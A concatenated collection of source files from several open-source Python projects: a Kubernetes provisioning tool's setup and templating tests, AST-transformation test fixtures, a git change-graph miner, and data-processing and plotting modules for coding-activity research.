version=os.environ.get('RELEASE_TAG', '0.0.0'),
long_description=get_content(readme_path),
long_description_content_type='text/markdown',
description='Provisioning tool for Kubernetes apps',
url='http://github.com/2gis/k8s-handle',
author='<NAME>',
author_email='<EMAIL>',
license='Apache 2.0',
packages=find_packages(exclude=("tests",)),
data_files=['requirements.txt'],
entry_points={
"console_scripts": [
"k8s-handle=k8s_handle:main",
]
},
install_requires=get_content('requirements.txt').split('\n'),
zip_safe=False)
```
#### File: k8s-handle/tests/test_templating.py
```python
import os
import yaml
import shutil
import unittest
from k8s_handle import settings
from k8s_handle import config
from k8s_handle import templating
from k8s_handle.templating import TemplateRenderingError
class TestTemplating(unittest.TestCase):
def setUp(self):
settings.CONFIG_FILE = 'tests/fixtures/config.yaml'
settings.TEMPLATES_DIR = 'templates/tests'
os.environ['CUSTOM_ENV'] = 'My value'
os.environ['K8S_CONFIG_DIR'] = '/tmp/kube/'
def tearDown(self):
if os.path.exists(settings.TEMP_DIR):
shutil.rmtree(settings.TEMP_DIR)
os.environ.pop('CUSTOM_ENV')
os.environ.pop('K8S_CONFIG_DIR')
def test_renderer_init(self):
r = templating.Renderer('/tmp/test')
self.assertEqual(r._templates_dir, '/tmp/test')
def test_none_context(self):
r = templating.Renderer('templates')
with self.assertRaises(RuntimeError) as context:
r.generate_by_context(None)
self.assertTrue('Can\'t generate templates from None context' in str(context.exception), str(context.exception))
def test_generate_templates(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_dirs')
r.generate_by_context(context)
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
file_path_4 = '{}/innerdir/template1.yaml'.format(settings.TEMP_DIR)
file_path_5 = '{}/template_include_file.yaml'.format(settings.TEMP_DIR)
file_path_6 = '{}/template_list_files.yaml'.format(settings.TEMP_DIR)
self.assertTrue(os.path.exists(file_path_1))
self.assertTrue(os.path.exists(file_path_2))
self.assertTrue(os.path.exists(file_path_3))
with open(file_path_1, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
with open(file_path_2, 'r') as f:
content = f.read()
self.assertEqual(content, 'TXkgdmFsdWU=')
with open(file_path_3, 'r') as f:
content = f.read()
self.assertEqual(content, 'My value')
with open(file_path_4, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
with open(file_path_5, 'r') as f:
content = f.read()
self.assertEqual(content, "test: |\n {{ hello world }}\n new\n line\n {{ hello world1 }}\n")
with open(file_path_6, 'r') as f:
content = f.read()
self.assertEqual(content, "test: |\n template1.yaml.j2:\n my_file.txt:\n my_file1.txt:\n ")
def test_no_templates_in_kubectl(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
with self.assertRaises(RuntimeError) as context:
r.generate_by_context(config.load_context_section('no_templates'))
self.assertTrue('Templates section doesn\'t have any template items' in str(context.exception))
def test_render_not_existent_template(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
with self.assertRaises(TemplateRenderingError) as context:
r.generate_by_context(config.load_context_section('not_existent_template'))
self.assertTrue('doesnotexist.yaml.j2' in str(context.exception), context.exception)
def test_generate_templates_with_kubectl_section(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('section_with_kubectl')
r.generate_by_context(context)
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
file_path_4 = '{}/innerdir/template1.yaml'.format(settings.TEMP_DIR)
self.assertTrue(os.path.exists(file_path_1))
self.assertTrue(os.path.exists(file_path_2))
self.assertTrue(os.path.exists(file_path_3))
with open(file_path_1, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
with open(file_path_2, 'r') as f:
content = f.read()
self.assertEqual(content, 'TXkgdmFsdWU=')
with open(file_path_3, 'r') as f:
content = f.read()
self.assertEqual(content, 'My value')
with open(file_path_4, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
def test_io_2709(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
with self.assertRaises(TemplateRenderingError) as context:
c = config.load_context_section('io_2709')
r.generate_by_context(c)
self.assertTrue('due to: \'undefined_variable\' is undefined' in str(context.exception))
def test_evaluate_tags(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
tags = {'tag1', 'tag2', 'tag3'}
self.assertTrue(r._evaluate_tags(tags, only_tags=['tag1'], skip_tags=None))
self.assertFalse(r._evaluate_tags(tags, only_tags=['tag4'], skip_tags=None))
self.assertFalse(r._evaluate_tags(tags, only_tags=['tag1'], skip_tags=['tag1']))
self.assertFalse(r._evaluate_tags(tags, only_tags=None, skip_tags=['tag1']))
self.assertTrue(r._evaluate_tags(tags, only_tags=None, skip_tags=['tag4']))
tags = set()
self.assertFalse(r._evaluate_tags(tags, only_tags=['tag4'], skip_tags=None))
self.assertTrue(r._evaluate_tags(tags, only_tags=None, skip_tags=['tag4']))
def test_get_template_tags(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
template_1 = {'template': 'template.yaml.j2', 'tags': ['tag1', 'tag2', 'tag3']}
template_2 = {'template': 'template.yaml.j2', 'tags': 'tag1,tag2,tag3'}
template_3 = {'template': 'template.yaml.j2', 'tags': ['tag1']}
template_4 = {'template': 'template.yaml.j2', 'tags': 'tag1'}
self.assertEqual(r._get_template_tags(template_1), {'tag1', 'tag2', 'tag3'})
self.assertEqual(r._get_template_tags(template_2), {'tag1', 'tag2', 'tag3'})
self.assertEqual(r._get_template_tags(template_3), {'tag1'})
self.assertEqual(r._get_template_tags(template_4), {'tag1'})
def test_get_template_tags_unexpected_type(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
template = {'template': 'template.yaml.j2', 'tags': {'tag': 'unexpected'}}
with self.assertRaises(TypeError) as context:
r._get_template_tags(template)
self.assertTrue('unexpected type' in str(context.exception))
def test_generate_group_templates(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_groups')
r.generate_by_context(context)
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
self.assertTrue(os.path.exists(file_path_1))
self.assertTrue(os.path.exists(file_path_2))
self.assertTrue(os.path.exists(file_path_3))
def test_templates_regex(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('templates_regex')
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
file_path_4 = '{}/template4.yaml'.format(settings.TEMP_DIR)
file_path_5 = '{}/innerdir/template1.yaml'.format(settings.TEMP_DIR)
file_path_6 = '{}/template_include_file.yaml'.format(settings.TEMP_DIR)
r.generate_by_context(context)
self.assertTrue(os.path.exists(file_path_1))
self.assertFalse(os.path.exists(file_path_2))
self.assertFalse(os.path.exists(file_path_3))
self.assertFalse(os.path.exists(file_path_4))
self.assertTrue(os.path.exists(file_path_5))
self.assertFalse(os.path.exists(file_path_6))
def test_templates_regex_parse_failed(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
c = config.load_context_section('templates_regex_invalid')
with self.assertRaises(TemplateRenderingError) as context:
r.generate_by_context(c)
self.assertTrue('Processing [: template [ hasn\'t been found' in str(context.exception))
def test_filters(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_filters')
r.generate_by_context(context)
result = '{}/filters.yaml'.format(settings.TEMP_DIR)
with open(result, 'r') as f:
actual = yaml.safe_load(f)
self.assertEqual('aGVsbG8gd29ybGQ=', actual.get('b64encode'))
self.assertEqual('k8s-handle', actual.get('b64decode'))
self.assertEqual('8fae6dd899aace000fd494fd6d795e26e2c85bf8e59d4262ef56b03dc91e924c', actual.get('sha256'))
affinity = [
{'effect': 'NoSchedule', 'key': 'dedicated', 'operator': 'Equal', 'value': 'monitoring'},
{'effect': 'NoSchedule', 'key': 'dedicated', 'operator': 'Equal', 'value': {'hello': 'world'}}
]
self.assertEqual(affinity, actual.get('affinity'))
def test_dashes(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_dashes')
r.generate_by_context(context)
result = '{}/template-dashes.yaml'.format(settings.TEMP_DIR)
with open(result, 'r') as f:
actual = yaml.safe_load(f)
self.assertEqual('do this', actual)
```
|
{
"source": "JetBrains-Research/ast-transformations",
"score": 2
}
|
#### File: data/class/in_3.py
```python
class A(object):
def __init__(self, arg):
self._arg = arg
```
#### File: data/classes_and_methods/in_1_basic.py
```python
class C:
def __init__(self):
pass
def foo(self, foo, bar):
print(foo, bar, self)
def bar(self):
pass
@classmethod
def class_baz(cls, x):
pass
@staticmethod
def static_yep(a, b, c):
pass
```
#### File: data/variables/in_5_nonlocal.py
```python
def foo():
var = 1
def bar():
nonlocal var
var = 42
i = var
```
#### File: data/variables/out_5.py
```python
def f1():
f1_v1 = 1
def f1_f1():
nonlocal f1_v1
f1_v1 = 42
f1_v2 = f1_v1
```
#### File: constantfolding/data/in_10_docstring.py
```python
def main():
"""
another Augmented Assignment
"""
d = 2 + 2
if __name__ == '__main__':
main()
```
#### File: data/logical/out_1.py
```python
def effect():
print("hello")
def foo():
return 1
pure_f_and = False
pure_t_and = foo()
pure_f_or = foo()
pure_t_or = True
# impure_f_and = ???
impure_t_and = [effect()] and foo()
# impure_f_or = ???
impure_t_or = [effect()]
```
#### File: deadcode/data/in_7_assertion_false.py
```python
def main():
assert False
print(1)
print(2)
```
#### File: deadcode/data/out_2.py
```python
def main(x):
while x % 4 == 0:
if x == 3:
print(1)
print(2)
print(3)
continue
pass
for _ in range(10):
if _ == 3:
break
print("ok")
return 4
```
#### File: multipleOperatorComparison/data/in_3_complex_multiple_comparison.py
```python
x = input()
y = input()
z = input()
flag = z % (1 + 1) == 0 and 1 < x < 123 or 1 > y > x > y < 123
def identity(var):
return var
if x ^ y == 1 or (x % 2 == 0 and 3 > x <= 3 <= y > z >= 5 or identity(-1) + hash('hello') < 10 + 120 < hash('world') - 1):
print(x, y, z)
```
#### File: multipleTargetAssignment/data/in_1_basic_multiple_target.py
```python
def main(x):
a = b = c = 5
```
|
{
"source": "JetBrains-Research/code-change-miner",
"score": 2
}
|
#### File: code-change-miner/vcs/traverse.py
```python
import os
import tempfile
import ast
import uuid
import pickle
import multiprocessing
import time
import json
import subprocess
import datetime
from functools import partial
from log import logger
from pydriller import RepositoryMining
from pydriller.domain.commit import ModificationType
import settings
import changegraph
class GitAnalyzer:
GIT_REPOSITORIES_DIR = settings.get('git_repositories_dir')
STORAGE_DIR = settings.get('change_graphs_storage_dir')
STORE_INTERVAL = settings.get('change_graphs_store_interval', 300)
TRAVERSE_ASYNC = settings.get('traverse_async', True)
MIN_DATE = None
if settings.get('traverse_min_date', required=False):
MIN_DATE = datetime.datetime.strptime(settings.get('traverse_min_date', required=False), '%d.%m.%Y') \
.replace(tzinfo=datetime.timezone.utc)
def __init__(self):
self._data_file_dir = os.path.join(self.GIT_REPOSITORIES_DIR, '.data.json')
self._data = {
'in_progress': [], # todo
'visited': []
}
self._load_data_file()
def _load_data_file(self):
with open(self._data_file_dir, 'a+') as f:
f.seek(0)
data = f.read()
if data:
try:
self._data = json.loads(data)
except:
logger.warning('Unable to load existing git repo data file')
def _save_data_file(self):
with open(self._data_file_dir, 'w+') as f:
json.dump(self._data, f, indent=4)
def build_change_graphs(self, parse_only_tests=False):
repo_names = [
name for name in os.listdir(self.GIT_REPOSITORIES_DIR)
if not name.startswith('_') and not name.startswith('.') and name not in self._data['visited']]
if not repo_names:
logger.warning('No available repositories were found')
return
logger.warning(f'Found {len(repo_names)} repositories, starting a build process')
if GitAnalyzer.TRAVERSE_ASYNC:
with multiprocessing.Pool(processes=multiprocessing.cpu_count(), maxtasksperchild=1000) as pool:
self._mine_changes(repo_names, pool=pool, parse_only_tests=parse_only_tests)
else:
self._mine_changes(repo_names, parse_only_tests=parse_only_tests)
def _mine_changes(self, repo_names, pool=None, parse_only_tests=False):
for repo_num, repo_name in enumerate(repo_names):
logger.warning(f'Looking at repo {repo_name} [{repo_num + 1}/{len(repo_names)}]')
self._data['visited'].append(repo_name)
self._save_data_file()
start = time.time()
commits = self._extract_commits(repo_name)
if pool and len(commits) > 0:
try:
pool.starmap(self._build_and_store_change_graphs, zip(commits, [parse_only_tests] * len(commits)))
except:
logger.error(f'Pool.map failed for repo {repo_name}', exc_info=True)
else:
for commit in commits:
self._build_and_store_change_graphs(commit, parse_only_tests)
logger.warning(f'Done building change graphs for repo={repo_name} [{repo_num + 1}/{len(repo_names)}]',
start_time=start)
def _extract_commits(self, repo_name):
start = time.time()
repo_path = os.path.join(self.GIT_REPOSITORIES_DIR, repo_name)
repo_url = self._get_repo_url(repo_path)
repo = RepositoryMining(repo_path, only_no_merge=True)
commits = []
for commit in repo.traverse_commits():
if not commit.parents:
continue
if self.MIN_DATE and commit.committer_date < self.MIN_DATE:
continue
cut = {
'author': {
'email': commit.author.email,
'name': commit.author.name
} if commit.author else None,
'num': len(commits) + 1,
'hash': commit.hash,
'dtm': commit.committer_date,
'msg': commit.msg,
'modifications': [],
'repo': {
'name': repo_name,
'path': repo_path,
'url': repo_url
}
}
for mod in commit.modifications:
cut['modifications'].append({
'type': mod.change_type,
'old_src': mod.source_code_before,
'old_path': mod.old_path,
'new_src': mod.source_code,
'new_path': mod.new_path
})
commits.append(cut)
logger.log(logger.WARNING, 'Commits extracted', start_time=start)
return commits
@staticmethod
def _get_repo_url(repo_path):
args = ['git', 'config', '--get', 'remote.origin.url']
result = subprocess.run(args, stdout=subprocess.PIPE, cwd=repo_path).stdout.decode('utf-8')
return result.strip()
@staticmethod
def _store_change_graphs(graphs):
pickled_graphs = []
for graph in graphs:
try:
pickled = pickle.dumps(graph, protocol=5)
pickled_graphs.append(pickled)
except RecursionError:
logger.error(f'Unable to pickle graph, file_path={graph.repo_info.old_method.file_path}, '
f'method={graph.repo_info.old_method.full_name}', exc_info=True)
filename = uuid.uuid4().hex
logger.info(f'Trying to store graphs to {filename}', show_pid=True)
with open(os.path.join(GitAnalyzer.STORAGE_DIR, f'{filename}.pickle'), 'w+b') as f:
pickle.dump(pickled_graphs, f)
logger.info(f'Storing graphs to {filename} finished', show_pid=True)
@staticmethod
def _build_and_store_change_graphs(commit, parse_only_tests=False):
change_graphs = []
commit_msg = commit['msg'].replace('\n', '; ')
logger.info(f'Looking at commit #{commit["hash"]}, msg: "{commit_msg}"', show_pid=True)
for mod in commit['modifications']:
if mod['type'] != ModificationType.MODIFY:
continue
if not all([mod['old_path'].endswith('.py'), mod['new_path'].endswith('.py')]):
continue
if parse_only_tests:
if mod['old_path'].find('test') == -1 and mod['new_path'].find('test') == -1:
continue
old_method_to_new = GitAnalyzer._get_methods_mapping(
GitAnalyzer._extract_methods(mod['old_path'], mod['old_src']),
GitAnalyzer._extract_methods(mod['new_path'], mod['new_src'])
)
for old_method, new_method in old_method_to_new.items():
old_method_src = old_method.get_source()
new_method_src = new_method.get_source()
if not all([old_method_src, new_method_src]) or old_method_src.strip() == new_method_src.strip():
continue
line_count = max(old_method_src.count('\n'), new_method_src.count('\n'))
if line_count > settings.get('traverse_file_max_line_count'):
                    logger.info(f'Ignored files due to line limit: {mod["old_path"]} -> {mod["new_path"]}')
continue
with tempfile.NamedTemporaryFile(mode='w+t', suffix='.py') as t1, \
tempfile.NamedTemporaryFile(mode='w+t', suffix='.py') as t2:
t1.writelines(old_method_src)
t1.seek(0)
t2.writelines(new_method_src)
t2.seek(0)
repo_info = RepoInfo(
commit['repo']['name'],
commit['repo']['path'],
commit['repo']['url'],
commit['hash'],
commit['dtm'],
mod['old_path'],
mod['new_path'],
old_method,
new_method,
author_email=commit['author']['email'] if commit.get('author') else None,
author_name=commit['author']['name'] if commit.get('author') else None
)
try:
cg = changegraph.build_from_files(
os.path.realpath(t1.name), os.path.realpath(t2.name), repo_info=repo_info)
except:
logger.log(logger.ERROR,
f'Unable to build a change graph for '
f'repo={commit["repo"]["path"]}, '
f'commit=#{commit["hash"]}, '
f'method={old_method.full_name}, '
f'line={old_method.ast.lineno}', exc_info=True, show_pid=True)
continue
change_graphs.append(cg)
if len(change_graphs) >= GitAnalyzer.STORE_INTERVAL:
GitAnalyzer._store_change_graphs(change_graphs)
change_graphs.clear()
if change_graphs:
GitAnalyzer._store_change_graphs(change_graphs)
change_graphs.clear()
@staticmethod
def _extract_methods(file_path, src):
try:
src_ast = ast.parse(src, mode='exec')
except:
logger.log(logger.INFO, 'Unable to compile src and extract methods', exc_info=True, show_pid=True)
return []
return ASTMethodExtractor(file_path, src).visit(src_ast)
@staticmethod
def _set_unique_names(methods):
method_name_to_cnt = {}
for method in methods:
cnt = method_name_to_cnt.setdefault(method.full_name, 0) + 1
method_name_to_cnt[method.full_name] = cnt
if cnt > 1:
method.full_name += f'#{cnt}'
@staticmethod
def _get_methods_mapping(old_methods, new_methods):
GitAnalyzer._set_unique_names(old_methods)
GitAnalyzer._set_unique_names(new_methods)
old_method_to_new = {}
for old_method in old_methods:
for new_method in new_methods:
if old_method.full_name == new_method.full_name:
old_method_to_new[old_method] = new_method
return old_method_to_new
class ASTMethodExtractor(ast.NodeVisitor):
def __init__(self, path, src):
self.file_path = path
self.src = src
def visit_Module(self, node):
methods = []
for st in node.body:
result = self.visit(st)
if result:
methods += result
return methods
def visit_ClassDef(self, node):
methods = []
for st in node.body:
result = self.visit(st)
if result:
methods += result
for method in methods:
method.extend_path(node.name)
return methods
def visit_FunctionDef(self, node):
return [Method(self.file_path, node.name, node, self.src)]
class Method:
def __init__(self, path, name, ast, src):
self.file_path = path
self.ast = ast
self.src = src.strip()
self.name = name
self.full_name = name
def extend_path(self, prefix, separator='.'):
self.full_name = f'{prefix}{separator}{self.full_name}'
# TODO: last = lines[end_lineno].encode()[:end_col_offset].decode(), IndexError: list index out of range
def get_source(self):
try:
return ast.get_source_segment(self.src, self.ast)
except:
logger.info(f'Unable to extract source segment from {self.ast}', show_pid=True)
return None
class RepoInfo:
def __init__(self, repo_name, repo_path, repo_url, commit_hash, commit_dtm,
old_file_path, new_file_path, old_method, new_method,
author_email=None, author_name=None):
self.repo_name = repo_name
self.repo_path = repo_path
self.repo_url = repo_url
self.commit_hash = commit_hash
self.commit_dtm = commit_dtm
self.old_file_path = old_file_path
self.new_file_path = new_file_path
self.old_method = old_method
self.new_method = new_method
self.author_email = author_email
self.author_name = author_name
```
|
{
"source": "JetBrains-Research/codetracker-data",
"score": 2
}
|
#### File: main/cli/processing.py
```python
import sys
import logging
sys.path.append('.')
from src.main.util import consts
from src.main.cli.util import ICli
from src.main.cli.configs import PROCESSING_LEVEL, PROCESSING_PARAMS
from src.main.util.log_util import configure_logger, add_console_stream
log = logging.getLogger(consts.LOGGER_NAME)
class PreprocessingCli(ICli):
def __init__(self):
super().__init__()
self._path = None
self._level = None
def configure_args(self) -> None:
self._parser.add_argument(PROCESSING_PARAMS.PATH.value, type=str, nargs=1, help='data path')
self._parser.add_argument(PROCESSING_PARAMS.LEVEL.value, nargs='?', const=3, default=3,
help=PROCESSING_LEVEL.description())
def parse_args(self) -> None:
args = self._parser.parse_args()
self._path = self.handle_path(args.path[0])
self._level = self.str_to_preprocessing_level(args.level)
def main(self) -> None:
self.parse_args()
path = self._path
for level_index in range(0, self._level.value + 1):
current_level = PROCESSING_LEVEL(level_index)
self._log.info(f'Current action is {current_level.level_handler()}')
path = current_level.level_handler()(path)
self._log.info(f'Folder with data: {path}')
print(f'Folder with data: {path}')
if __name__ == '__main__':
configure_logger(to_delete_previous_logs=True)
add_console_stream(log)
preprocessing_cli = PreprocessingCli()
preprocessing_cli.main()
```
#### File: src/main/main.py
```python
import sys
import logging
sys.path.append('.')
sys.path.append('../..')
from src.main.util import consts
from src.main.util.log_util import configure_logger, add_console_stream
log = logging.getLogger(consts.LOGGER_NAME)
def main() -> None:
configure_logger(to_delete_previous_logs=True)
add_console_stream(log)
if __name__ == '__main__':
main()
```
#### File: main/plots/profile_statistics_plots.py
```python
import logging
from typing import Dict, Any, List, Optional
import pandas as pd
import plotly.express as px
from src.main.util import consts
from src.main.util.consts import INT_EXPERIENCE, EXPERIENCE
from src.main.util.log_util import log_and_raise_error
from src.main.plots.util.plotly_util import save_plot, plot_and_save_freq_chart
from src.main.util.file_util import get_parent_folder, deserialize_data_from_file
from src.main.plots.util.plots_common import to_filter_rare_values, get_readable_key, get_labels_for_freq_plots
from src.main.plots.util.consts import PLOTTY_CATEGORY_ORDER, CHART_TYPE, STATISTICS_FREQ, STATISTICS_SHOWING_KEY, \
STATISTICS_KEY, STATISTICS_COLORS
log = logging.getLogger(consts.LOGGER_NAME)
def __read_statistics_from_file(path: str, default_value: consts.DEFAULT_VALUE, column: STATISTICS_KEY) -> Dict[str, Any]:
statistics_dict = deserialize_data_from_file(path)
readable_statistics_dict = {}
keys = statistics_dict.keys()
    # Sort the keys in the predefined experience order
if column == STATISTICS_KEY.EXPERIENCE:
keys = __sort_experience_keys(keys)
for key in keys:
readable_statistics_dict[__get_readable_key_specific_by_column(key, default_value, column)] = statistics_dict[key]
return readable_statistics_dict
def __sort_experience_keys(keys: List[str]) -> List[str]:
experiences_keys = [x for x in EXPERIENCE.sorted_values() if x in keys]
experiences_keys += [x for x in keys if x not in experiences_keys]
return experiences_keys
def __get_readable_key_specific_by_column(key: str, default_value: consts.DEFAULT_VALUE, column: STATISTICS_KEY) -> str:
if column == STATISTICS_KEY.EXPERIENCE:
try:
return INT_EXPERIENCE[key].get_short_str()
except KeyError:
return get_readable_key(key, default_value)
return get_readable_key(key, default_value)
def __get_statistics_df_from_file(path: str, column: STATISTICS_KEY, default_value: consts.DEFAULT_VALUE,
to_union_rare: bool = False) -> pd.DataFrame:
statistics_dict = __read_statistics_from_file(path, default_value, column)
statistics_df = pd.DataFrame(statistics_dict.items(), columns=[column.value, STATISTICS_FREQ])
# If we want to union rare values
if to_union_rare:
to_filter_series = to_filter_rare_values(statistics_df)
statistics_df.loc[to_filter_series, column.value] \
= [STATISTICS_SHOWING_KEY.OTHERS.value] * to_filter_series.size
return statistics_df
def __get_title_for_plots(column: STATISTICS_KEY) -> str:
return get_readable_key(column.value) + ' distribution'
def __plot_pie_chart(statistics_df: pd.DataFrame, title: str, path: str, column: STATISTICS_KEY,
labels: Dict[str, str], plot_name: str = 'distribution_plot',
format: consts.EXTENSION = consts.EXTENSION.HTML, auto_open: bool = False) -> None:
fig = px.pie(statistics_df, values=STATISTICS_FREQ, names=column.value, title=title,
color_discrete_sequence=STATISTICS_COLORS.PIE_CHART.value,
hover_data=[STATISTICS_FREQ],
labels=labels)
fig.update_traces(textposition='inside', textinfo='percent')
save_plot(fig, path, CHART_TYPE.PIE, plot_name, format, auto_open)
# For more details see
# https://github.com/JetBrains-Research/task-tracker-post-processing/wiki/Visualization:-participants-distribution
def plot_profile_statistics(file: str, column: STATISTICS_KEY, plot_type: CHART_TYPE, to_union_rare: bool = False,
format: consts.EXTENSION = consts.EXTENSION.HTML, auto_open: bool = False,
x_category_order: PLOTTY_CATEGORY_ORDER = PLOTTY_CATEGORY_ORDER.TOTAL_ASCENDING,
x_axis_title: Optional[str] = None, y_axis_title: Optional[str] = None,
to_add_percents: bool = False, to_add_title: bool = True) -> None:
default_value = column.get_default()
statistics_df = __get_statistics_df_from_file(file, column, default_value, to_union_rare)
path = get_parent_folder(file)
labels = get_labels_for_freq_plots(column)
title = __get_title_for_plots(column) if to_add_title else None
if plot_type == CHART_TYPE.PIE:
__plot_pie_chart(statistics_df, title, path, column, labels, plot_name=column.value, format=format,
auto_open=auto_open)
elif plot_type == CHART_TYPE.BAR:
plot_and_save_freq_chart(statistics_df, title, path, column, labels, plot_name=column.value, format=format,
auto_open=auto_open, x_category_order=x_category_order, x_axis_title=x_axis_title,
y_axis_title=y_axis_title, to_add_percents=to_add_percents)
else:
log_and_raise_error(f'Plot type {plot_type} is incorrect!', log)
```
#### File: main/plots/scoring_solutions_plots.py
```python
from typing import List, Union, Tuple
import pandas as pd
from src.main.util import consts
from src.main.task_scoring.task_scoring import unpack_tests_results
from src.main.util.file_util import get_parent_folder, get_name_from_path
from src.main.util.consts import ISO_ENCODING, TASK_TRACKER_COLUMN, TEST_RESULT, TASK
from src.main.plots.util.graph_representation_util import get_color_by_rate, get_graph_representation, create_dot_graph
TESTS_RESULTS = consts.TASK_TRACKER_COLUMN.TESTS_RESULTS.value
FILE_NAME = consts.TASK_TRACKER_COLUMN.FILE_NAME.value
def __find_next_score_index(scores: List[float], start_index: int = 0) -> int:
for i in range(start_index, len(scores)):
if scores[i] != scores[start_index]:
return i
return len(scores)
def __get_label_for_score(id: int, label: Union[str, int], score: float) -> str:
return f'{id} [label="{label}", style=filled, fillcolor={get_color_by_rate(score)}]\n'
def __get_edge(src_id: int, dst_id: int) -> str:
return f'{src_id} -> {dst_id}\n'
def get_labels_and_graph_structure(scores: List[float]) -> Tuple[str, str]:
labels = ''
structure = ''
i = 0
while i < len(scores):
next_score_index = __find_next_score_index(scores, i)
# Collapse long chains of vertices with the same score
# Add the current vertex
labels += __get_label_for_score(i + 1, i + 1, scores[i])
# If the current vertex is not the first, add en edge with the previous one
if i != 0:
structure += __get_edge(i, i + 1)
# If we need to add an intermediate vertex
if i < next_score_index - 2:
# Add an intermediate vertex
labels += __get_label_for_score(i + 2, '...', scores[i])
structure += __get_edge(i + 1, i + 2)
labels += __get_label_for_score(next_score_index, next_score_index, scores[i])
structure += __get_edge(i + 2, next_score_index)
i = next_score_index - 1
i += 1
return labels, structure
def __is_incorrect_fragment(tests_results: str) -> bool:
return TEST_RESULT.INCORRECT_CODE.value in unpack_tests_results(tests_results, TASK.tasks())
def calculate_current_task_rate(df: pd.DataFrame) -> pd.DataFrame:
file_name = df[FILE_NAME].unique()[0]
current_task = TASK(get_name_from_path(file_name, False))
return df[TESTS_RESULTS].apply(lambda x: unpack_tests_results(x, TASK.tasks())[TASK.tasks().index(current_task)])
# For more details see
# https://github.com/JetBrains-Research/task-tracker-post-processing/wiki/Visualization:-scoring-solutions-plots
def plot_scoring_solutions(tt_file_path: str, name_prefix: str = 'scoring_solution') -> str:
ct_df = pd.read_csv(tt_file_path, encoding=ISO_ENCODING)
# Delete incorrect fragments
correct_df = ct_df[ct_df.apply(lambda row: not __is_incorrect_fragment(row[TESTS_RESULTS]), axis=1)]
correct_df[TESTS_RESULTS] = calculate_current_task_rate(correct_df)
scores = correct_df[TASK_TRACKER_COLUMN.TESTS_RESULTS.value].values
labels, graph_structure = get_labels_and_graph_structure(scores)
solutions_representation = get_graph_representation(labels, graph_structure)
output_path = get_parent_folder(tt_file_path)
output_path = create_dot_graph(output_path,
f'{get_name_from_path(tt_file_path, False)}_{name_prefix}',
solutions_representation)
return output_path
```
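A hedged usage sketch of get_labels_and_graph_structure, assuming it is importable from src.main.plots.scoring_solutions_plots: a chain of three equal scores is collapsed into a first vertex, a '...' placeholder, and a last vertex, and the next different score gets its own vertex.

```python
# Minimal sketch under the assumption above; the fill colors inside the labels
# come from get_color_by_rate and are not spelled out here.
from src.main.plots.scoring_solutions_plots import get_labels_and_graph_structure

scores = [0.5, 0.5, 0.5, 1.0]
labels, structure = get_labels_and_graph_structure(scores)
# Vertices 1 and 3 keep their indices as labels, vertex 2 becomes the '...' placeholder,
# vertex 4 carries the new score; structure holds the edges 1 -> 2, 2 -> 3, 3 -> 4.
print(labels)
print(structure)
```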
#### File: main/processing/activity_tracker_handler.py
```python
import logging
import datetime
from typing import Dict, List, Any, Tuple
import pandas as pd
from src.main.util import consts
from src.main.util.log_util import log_and_raise_error
from src.main.util.time_util import get_datetime_by_format
from src.main.util.language_util import get_extension_by_language
from src.main.util.file_util import get_name_from_path, get_original_file_name_with_extension
log = logging.getLogger(consts.LOGGER_NAME)
# Unification of similar activity tracker events. For example, the action Run triggered by clicking the Run button
# and the same action triggered by a keyboard shortcut are recorded differently in the source data. After the
# unification, the function returns new activity tracker data with these kinds of events merged.
def __unify_activity_tracker_columns(ati_data: pd.DataFrame) -> pd.DataFrame:
action_events = consts.ACTIVITY_TRACKER_EVENTS.action_events()
for index in range(ati_data.shape[0]):
current_focused_component = ati_data[consts.ACTIVITY_TRACKER_COLUMN.FOCUSED_COMPONENT.value].iloc[index]
if current_focused_component in action_events:
ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].iloc[index] \
= ati_data[consts.ACTIVITY_TRACKER_COLUMN.FOCUSED_COMPONENT.value].iloc[index]
ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].iloc[index] \
= consts.ACTIVITY_TRACKER_EVENTS.ACTION.value
return ati_data
# Filtering the activity-tracker data: returns new activity-tracker data with unnecessary events removed
# The necessary events are listed in the consts file: ACTIVITY_TRACKER_EVENTS and ACTION_EVENTS
def __filter_ati_data(ati_data: pd.DataFrame) -> pd.DataFrame:
event_types = [consts.ACTIVITY_TRACKER_EVENTS.ACTION.value,
consts.ACTIVITY_TRACKER_EVENTS.COMPILATION_FINISHED.value]
